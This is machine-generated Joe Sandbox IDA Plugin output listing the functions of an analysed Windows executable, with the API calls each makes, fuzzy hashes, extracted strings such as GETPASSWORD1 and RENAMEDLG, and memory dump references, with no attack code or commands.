Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ErrorLast$_free
• String ID:
• API String ID: 3170660625-0
• Opcode ID: d555d3f3ef661479af4959cc6f8ed992a3548d11a58c214c3a94f33d8155ca4d
• Instruction ID: bb53df516e62a95e51950a256051d3369eef83033b5aef9bb44ec3d4a1a25fe3
• Opcode Fuzzy Hash: d555d3f3ef661479af4959cc6f8ed992a3548d11a58c214c3a94f33d8155ca4d
• Instruction Fuzzy Hash: 5101D6B634573067870176253C89A1B262D9FD17797B2413FF85492282EE7DCC11416D
APIs
• _free.LIBCMT ref: 00429282
  • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
  • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
• _free.LIBCMT ref: 00429294
• _free.LIBCMT ref: 004292A6
• _free.LIBCMT ref: 004292B8
• _free.LIBCMT ref: 004292CA
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: a1829ea2b3eb210ceaefd532cec745a222f1351db4686e978950cec9d8d88917
• Instruction ID: 133d977a3d054801380cd796775e33e02f3e2e3cde2545a78cd53746e0fb53e9
• Opcode Fuzzy Hash: a1829ea2b3eb210ceaefd532cec745a222f1351db4686e978950cec9d8d88917
• Instruction Fuzzy Hash: 09F03CB2745620EB8A24EB59F882C0773E9AA04721BA85C4AF088D7651C638FC80867C
APIs
• _free.LIBCMT ref: 0042555D
  • Part of subcall function 004259C2: RtlFreeHeap.NTDLL(00000000,00000000,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?), ref: 004259D8
  • Part of subcall function 004259C2: GetLastError.KERNEL32(?,?,00429301,?,00000000,?,00000000,?,00429328,?,00000007,?,?,00429725,?,?), ref: 004259EA
• _free.LIBCMT ref: 0042556F
• _free.LIBCMT ref: 00425582
• _free.LIBCMT ref: 00425593
• _free.LIBCMT ref: 004255A4
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 23a7715d7dfdb1df1902732dc659bd9b695696a9c651b32b57ec6052dcaa2025
• Instruction ID: 34cca55894990acdd89f455b95b3aecaad4c8957479b29ce9a9e18f76f1185f0
• Opcode Fuzzy Hash: 23a7715d7dfdb1df1902732dc659bd9b695696a9c651b32b57ec6052dcaa2025
• Instruction Fuzzy Hash: 36F0BDF1612B209BCB056F19BC414093B75FF08B27385126BF49056266C739C9619ACE
APIs
• GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\file.exe,00000104), ref: 00424C1A
• _free.LIBCMT ref: 00424CE5
• _free.LIBCMT ref: 00424CEF
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: _free$FileModuleName
• String ID: C:\Users\user\Desktop\file.exe
• API String ID: 2506810119-1957095476
• Opcode ID: e0490f60ade2d1468c9140943e35bed9e18652c5d0527b2ae2ea00ebe4e88e47
• Instruction ID: 7575aa31d2d93257cdfb248a7f5de75f770f07e981ee8fe62857961938ef6c11
• Opcode Fuzzy Hash: e0490f60ade2d1468c9140943e35bed9e18652c5d0527b2ae2ea00ebe4e88e47
• Instruction Fuzzy Hash: AE317271B01228ABDB21DF9AA88199EBBF8EBC4710B51406BF80597211D7788A40CB99
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00407468
                                                                                        • Part of subcall function 00403AA3: __EH_prolog.LIBCMT ref: 00403AA8
                                                                                      • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000), ref: 0040752E
                                                                                        • Part of subcall function 00407A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 00407AAC
                                                                                        • Part of subcall function 00407A9D: GetLastError.KERNEL32 ref: 00407AF2
                                                                                        • Part of subcall function 00407A9D: CloseHandle.KERNEL32(?), ref: 00407B01
Strings
Memory Dump Source
• Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_file.jbxd
Similarity
• API ID: ErrorH_prologLast$CloseCurrentHandleProcess
• String ID: SeRestorePrivilege$SeSecurityPrivilege
• API String ID: 3813983858-639343689
• Opcode ID: bf08ee1ff69437d9def4f8d3a991ac00f907d52313835109dd9fe643a1b4b2d0
• Instruction ID: 0ebbc69834176c0f24fc774e2054f5db0fdf3fe6e6fca9ed97e6473e2bdfabc6
• Opcode Fuzzy Hash: bf08ee1ff69437d9def4f8d3a991ac00f907d52313835109dd9fe643a1b4b2d0
• Instruction Fuzzy Hash: 41318171E44208AADF10EB65AC42BEFBB68AF44358F00407BF445B72D2D7786A44876A
APIs
  • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
  • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
• EndDialog.USER32(?,00000001), ref: 004191AB
• GetDlgItemTextW.USER32(?,00000065,00000000,?), ref: 004191C0
• SetDlgItemTextW.USER32(?,00000065,?), ref: 004191D5
Strings
Similarity
• API ID: ItemText$DialogWindow
• String ID: ASKNEXTVOL
• API String ID: 445417207-3402441367
• Opcode ID: 27c9492c255a67440cc051533c36f0ea40a96704dcb89835f6127280c112fe21
• Instruction ID: 1ad12870d0311b6f672f0a0fa01a212b859fcd40f4e810268bc3a2f15caa4e4a
• Opcode Fuzzy Hash: 27c9492c255a67440cc051533c36f0ea40a96704dcb89835f6127280c112fe21
• Instruction Fuzzy Hash: 3511E132241212BFE2019BA49D4DFD63FA9EF4A701F000426F641AB1B1C2299CD2DB2E
APIs
• DialogBoxParamW.USER32(GETPASSWORD1,?,00419646,?,?), ref: 0041C022
Strings
Similarity
• API ID: DialogParam
• String ID: *aD$*aD$GETPASSWORD1
• API String ID: 665744214-2661886367
• Opcode ID: 71f20207c6e13983ac7fc770ba50cc998914c8a9a7605082e957a74541584fbd
• Instruction ID: 9d421776b45a6d62717eef33d716dbef8e71b6f6fad618f6f8edc459a64e0920
• Opcode Fuzzy Hash: 71f20207c6e13983ac7fc770ba50cc998914c8a9a7605082e957a74541584fbd
• Instruction Fuzzy Hash: 54115932284204AADB119E64AC41BEB3B88B70A711F14407BFD45A7181D7BC5C80D79D
APIs
  • Part of subcall function 004012E7: GetDlgItem.USER32(00000000,00003021), ref: 0040132B
  • Part of subcall function 004012E7: SetWindowTextW.USER32(00000000,004302E4), ref: 00401341
• EndDialog.USER32(?,00000001), ref: 00419694
• GetDlgItemTextW.USER32(?,00000065,?,00000080), ref: 004196AC
• SetDlgItemTextW.USER32(?,00000066,?), ref: 004196DA
Strings
Similarity
• API ID: ItemText$DialogWindow
• String ID: GETPASSWORD1
• API String ID: 445417207-3292211884
• Opcode ID: 087956dcc0f3e5f5cd4335f02cfc9395c7e8dd536ffdab82a82b355ae5e90f31
• Instruction ID: 100f3b192e9cfbdd8f2b2b98036ae69839b57edfbb7e790b106f506355c950cf
• Opcode Fuzzy Hash: 087956dcc0f3e5f5cd4335f02cfc9395c7e8dd536ffdab82a82b355ae5e90f31
• Instruction Fuzzy Hash: CD110833A401197BDB219E659D59FFB376CEB49740F00002AFA45F25C0C2BD9D9196B9
APIs
• _swprintf.LIBCMT ref: 0040B127
  • Part of subcall function 00403F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00403F6E
• _wcschr.LIBVCRUNTIME ref: 0040B145
• _wcschr.LIBVCRUNTIME ref: 0040B155
Strings
Similarity
• API ID: _wcschr$__vswprintf_c_l_swprintf
• String ID: %c:\
• API String ID: 525462905-3142399695
• Opcode ID: ab0f35cbc93ec0c3895bcef5fc26dd1b196007fa916bd85788b52985f6bda9c2
• Instruction ID: 83dfc5739848c9a2cc9a31e59d8c1738e83a7b92f3f4c1f9231d81973378a19b
• Opcode Fuzzy Hash: ab0f35cbc93ec0c3895bcef5fc26dd1b196007fa916bd85788b52985f6bda9c2
• Instruction Fuzzy Hash: 7A01D62750031175C630AB769C41D6BB7ACEF557A0B90442BF884EA1C2FB38D851C2ED
APIs
• InitializeCriticalSection.KERNEL32(000001A0,00441E74,00000000,?,?,0040FB88,00000020,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?), ref: 0040F969
• CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF), ref: 0040F973
• CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,0040A7C2,?,0040C74B,?,00000000,?,00000001,?,?,?,00413AFF), ref: 0040F983
Strings
• Thread pool initialization failed., xrefs: 0040F99B
Similarity
• API ID: Create$CriticalEventInitializeSectionSemaphore
• String ID: Thread pool initialization failed.
• API String ID: 3340455307-2182114853
• Opcode ID: a82eb56b1eaa3b152ec46273dee2aac128424b501c3008b8562f01dd859fc14b
• Instruction ID: 3b37a7d0d68a4c9a63eecc056d335734bdcae90b647a557777762d499f4852a2
• Opcode Fuzzy Hash: a82eb56b1eaa3b152ec46273dee2aac128424b501c3008b8562f01dd859fc14b
• Instruction Fuzzy Hash: B5119AB1600705AFD3305F66A899AA7FBECEF95754F10483FE2DA92240DA742840CB54
Strings
Similarity
• API ID:
• String ID: RENAMEDLG$REPLACEFILEDLG
• API String ID: 0-56093855
• Opcode ID: 5d5f502b135f9ba1f65ca1c5644faffe898d8437fcb85ec40f5018cc14906c71
• Instruction ID: 7a3690c2807c8c699c404bc87d5611777972c0596adae7d95efb857740de833d
• Opcode Fuzzy Hash: 5d5f502b135f9ba1f65ca1c5644faffe898d8437fcb85ec40f5018cc14906c71
• Instruction Fuzzy Hash: 69017176609205AFD7019B18FD40EA6BBE9E74A394F014437FA41D2230D3659C52DFAE
APIs
• GetModuleHandleW.KERNEL32(00000000), ref: 0040CE57
• FindResourceW.KERNEL32(00000000,RTL,00000005), ref: 0040CE66
Strings
Similarity
• API ID: FindHandleModuleResource
• String ID: LTR$RTL
• API String ID: 3537982541-719208805
• Opcode ID: f5531f7fdbf86b5848456118a828e2f3a448ef7cba4e36e775f8be5f79b79e57
• Instruction ID: b3a90f969d2e1b819b8badd8afbcbbcbbf3d021c2709553dbbb571471155815d
• Opcode Fuzzy Hash: f5531f7fdbf86b5848456118a828e2f3a448ef7cba4e36e775f8be5f79b79e57
• Instruction Fuzzy Hash: 7BF0F621644314A7E6345665AC1AF6737ACE785B00F0043BEB645961C0DBA9990987E9
APIs
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00407F55,?,?,?), ref: 00409FD0
• CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00407F55,?,?), ref: 0040A014
• SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00407F55,?,?,?,?,?,?,?,?), ref: 0040A095
• CloseHandle.KERNEL32(?,?,00000000,?,00407F55,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A09C
Similarity
• API ID: File$Create$CloseHandleTime
• String ID:
• API String ID: 2287278272-0
• Opcode ID: 09143fdbaabf4abb9215d8cf038442808fc2e431ca9a32863b896d2d661c1e2a
• Instruction ID: be39ff34c6672a3e1122f0c0cd9ce7929570613bf26094579ca1c930b93c29d7
• Opcode Fuzzy Hash: 09143fdbaabf4abb9215d8cf038442808fc2e431ca9a32863b896d2d661c1e2a
• Instruction Fuzzy Hash: 9841D0312483859AD731DF24DC45FABBBE8AB85704F04092EB5D4E32C1D6789A0C875B
APIs
• MultiByteToWideChar.KERNEL32(?,00000000,F5E85006,00422794,00000000,00000000,00422FC2,?,00422FC2,?,00000001,00422794,F5E85006,00000001,00422FC2,00422FC2), ref: 00429440
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004294C9
• GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004294DB
• __freea.LIBCMT ref: 004294E4
  • Part of subcall function 004259FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                      • String ID:
                                                                                      • API String ID: 2652629310-0
                                                                                      • Opcode ID: 2486c37c843befccd92cc6c04341fafaeb1d5c4fe3b75795d77b5d5c47f578ee
                                                                                      • Instruction ID: 55cb407fbba19a32dacdc7774063185a3600d30289ff6605764e9969f687a012
                                                                                      • Opcode Fuzzy Hash: 2486c37c843befccd92cc6c04341fafaeb1d5c4fe3b75795d77b5d5c47f578ee
                                                                                      • Instruction Fuzzy Hash: B731F072A0022AABDF25AF65EC41DAF7BA5EF00310F44422AFC04D7250E739CD52CB94
                                                                                      APIs
                                                                                      • LoadBitmapW.USER32(00000065), ref: 00419A86
                                                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00419AA7
                                                                                      • DeleteObject.GDI32(00000000), ref: 00419ACF
                                                                                      • DeleteObject.GDI32(00000000), ref: 00419AEE
                                                                                        • Part of subcall function 00418BD0: FindResourceW.KERNELBASE(00000066,PNG,?,?,00419AC8,00000066), ref: 00418BE1
                                                                                        • Part of subcall function 00418BD0: SizeofResource.KERNEL32(00000000,75295780,?,?,00419AC8,00000066), ref: 00418BF9
                                                                                        • Part of subcall function 00418BD0: LoadResource.KERNEL32(00000000,?,?,00419AC8,00000066), ref: 00418C0C
                                                                                        • Part of subcall function 00418BD0: LockResource.KERNEL32(00000000,?,?,00419AC8,00000066), ref: 00418C17
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                                                                      • String ID:
                                                                                      • API String ID: 142272564-0
                                                                                      • Opcode ID: aae964c5a5e832d2a491ffb6267801f5ea6ff549f9e4239260615fc5deb102ec
                                                                                      • Instruction ID: 9b58e65e1d2ced7c129d24bb43d728f6f417577d3bcdd415e0e76cf14d4ae957
                                                                                      • Opcode Fuzzy Hash: aae964c5a5e832d2a491ffb6267801f5ea6ff549f9e4239260615fc5deb102ec
                                                                                      • Instruction Fuzzy Hash: E301473368020437C21077359C42EFFB2AEDF85BA5F08002AF900E7251DE598C5582A9
                                                                                      APIs
                                                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 00421020
                                                                                        • Part of subcall function 00421658: ___AdjustPointer.LIBCMT ref: 004216A2
                                                                                      • _UnwindNestedFrames.LIBCMT ref: 00421037
                                                                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 00421049
                                                                                      • CallCatchBlock.LIBVCRUNTIME ref: 0042106D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                                                                      • String ID:
                                                                                      • API String ID: 2633735394-0
                                                                                      • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                      • Instruction ID: 80f4c66d099d73dfdd289a2da929afb3482be3845ac9810e61bdd392d2d44168
                                                                                      • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                                                                      • Instruction Fuzzy Hash: 21012D32100159FBCF125F56DC41EDA7BB9EF58754F45401AFD1865121C339E8A1DB94
                                                                                      APIs
                                                                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00420B66
                                                                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00420B6B
                                                                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00420B70
                                                                                        • Part of subcall function 00421C0E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00421C1F
                                                                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00420B85
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                                                                      • String ID:
                                                                                      • API String ID: 1761009282-0
                                                                                      • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                      • Instruction ID: ef1f28de980ea73d1d059b065ea788e490f593ce141cf60a47778f23d19d9c54
                                                                                      • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                                                                      • Instruction Fuzzy Hash: D2C04CA93542B0541C343AF336021AE07C00C767DE7D111CFA891172375A0E540A603F
                                                                                      APIs
                                                                                        • Part of subcall function 00418BA5: GetDC.USER32(00000000), ref: 00418BA9
                                                                                        • Part of subcall function 00418BA5: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00418BB4
                                                                                        • Part of subcall function 00418BA5: ReleaseDC.USER32(00000000,00000000), ref: 00418BBF
                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 00418D24
                                                                                        • Part of subcall function 00418EEA: GetDC.USER32(00000000), ref: 00418EF3
                                                                                        • Part of subcall function 00418EEA: GetObjectW.GDI32(?,00000018,?), ref: 00418F22
                                                                                        • Part of subcall function 00418EEA: ReleaseDC.USER32(00000000,?), ref: 00418FB6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ObjectRelease$CapsDevice
                                                                                      • String ID: (
                                                                                      • API String ID: 1061551593-3887548279
                                                                                      • Opcode ID: 64171df757ed768744e2e22994194725f5a0cd9a101f525b84aab6c9ae049917
                                                                                      • Instruction ID: 4bd2fa2783d531d3fb11dd477b2d0390eafbba661acf2b3b907c2a716d6d4396
                                                                                      • Opcode Fuzzy Hash: 64171df757ed768744e2e22994194725f5a0cd9a101f525b84aab6c9ae049917
                                                                                      • Instruction Fuzzy Hash: 0D6114B1204305AFD210DF64C888EABBBE9FF89704F10495EF599C7260CB35E846CB66
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: _swprintf
                                                                                      • String ID: %ls$%s: %s
                                                                                      • API String ID: 589789837-2259941744
                                                                                      • Opcode ID: d11954739eea34fad46824556b4284334c8bdd64b4a532404cdbe83fc6355c6e
                                                                                      • Instruction ID: bdac8a5c8cc74f88d730a68ebf3e8f625cc28345b767a64e3f9eff6180920be0
                                                                                      • Opcode Fuzzy Hash: d11954739eea34fad46824556b4284334c8bdd64b4a532404cdbe83fc6355c6e
                                                                                      • Instruction Fuzzy Hash: CC51E43128C300FAEA211A948C4AFE53655AB05F00F60855BF78A684E6C5FE9CD6661F
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 0040761E
                                                                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00407799
                                                                                        • Part of subcall function 0040A0C3: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00409EF9,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 0040A0D7
                                                                                        • Part of subcall function 0040A0C3: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00409EF9,?,?,?,00409D92,?,00000001,00000000,?,?), ref: 0040A108
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$Attributes$H_prologTime
                                                                                      • String ID: :
                                                                                      • API String ID: 1861295151-336475711
                                                                                      • Opcode ID: 58a6356984b005caafd33ed77775c5f43441efb3fd6cc2288d6cb7772f80a03d
                                                                                      • Instruction ID: 9010d32154f792f1e88284cdbfe6923ec057783e04b3e2b12577616e13bcdb97
                                                                                      • Opcode Fuzzy Hash: 58a6356984b005caafd33ed77775c5f43441efb3fd6cc2288d6cb7772f80a03d
                                                                                      • Instruction Fuzzy Hash: 5A418B71808218AADB24EB61DC45EEE777CAF44344F0040BFB545B71C2DB786E89CB6A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: UNC$\\?\
                                                                                      • API String ID: 0-253988292
                                                                                      • Opcode ID: 59418b8d02dc80c9185aefb35123d512a5759d39c114300e375357c0869d6347
                                                                                      • Instruction ID: 1cb071ac49dc019430a20a9a31e14aa50c7fe294fdd32942590b0da6c684df21
                                                                                      • Opcode Fuzzy Hash: 59418b8d02dc80c9185aefb35123d512a5759d39c114300e375357c0869d6347
                                                                                      • Instruction Fuzzy Hash: 78415C3140021AB6CB21AF229C41BEF7769EF05354F20457BF854B62C2E778DA95DAAC
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
